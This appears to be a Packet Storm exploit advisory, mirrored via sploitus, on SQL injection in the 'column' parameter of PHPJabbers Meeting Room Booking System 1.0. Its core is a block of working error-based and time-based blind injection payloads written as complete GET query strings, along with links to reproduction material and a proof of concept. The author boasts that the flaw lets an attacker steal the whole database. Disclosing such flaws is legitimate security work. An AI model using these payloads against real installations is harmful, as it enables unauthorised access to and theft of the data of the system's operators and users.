Share
## https://sploitus.com/exploit?id=PACKETSTORM:174539
## Title: Meeting Room Booking System-1.0 Multiple - SQLi  
## Author: nu11secur1ty  
## Date: 09/06/2023  
## Vendor: https://www.phpjabbers.com/  
## Software: https://www.phpjabbers.com/meeting-room-booking-system/#sectionDemo  
## Reference: https://portswigger.net/web-security/sql-injection  
  
## Description:  
The column parameter appears to be vulnerable to SQL injection  
attacks. The payload ' was submitted in the column parameter, and a  
database error message was returned. The attacker easily can steal all  
information from the database of this web application!  
WARNING! All of you: Be careful what you buy! This will be your responsibility!  
  
STATUS: HIGH-CRITICAL Vulnerability  
  
[+]Payload:  
```mysql  
---  
Parameter: column (GET)  
Type: error-based  
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)  
Payload: controller=pjFront&action=pjActionRooms&locale=1&index=2467&column=(SELECT  
6118 FROM(SELECT COUNT(*),CONCAT(0x716a717171,(SELECT  
(ELT(6118=6118,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&direction=ASC&page=1  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind - Parameter replace  
Payload: controller=pjFront&action=pjActionRooms&locale=1&index=2467&column=(CASE  
WHEN (6735=6735) THEN SLEEP(5) ELSE 6735 END)&direction=ASC&page=1  
---  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Meeting-Room-Booking-System-1.0)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2023/09/meeting-room-booking-system-10-multiple.html)  
  
## Time spent:  
01:47:00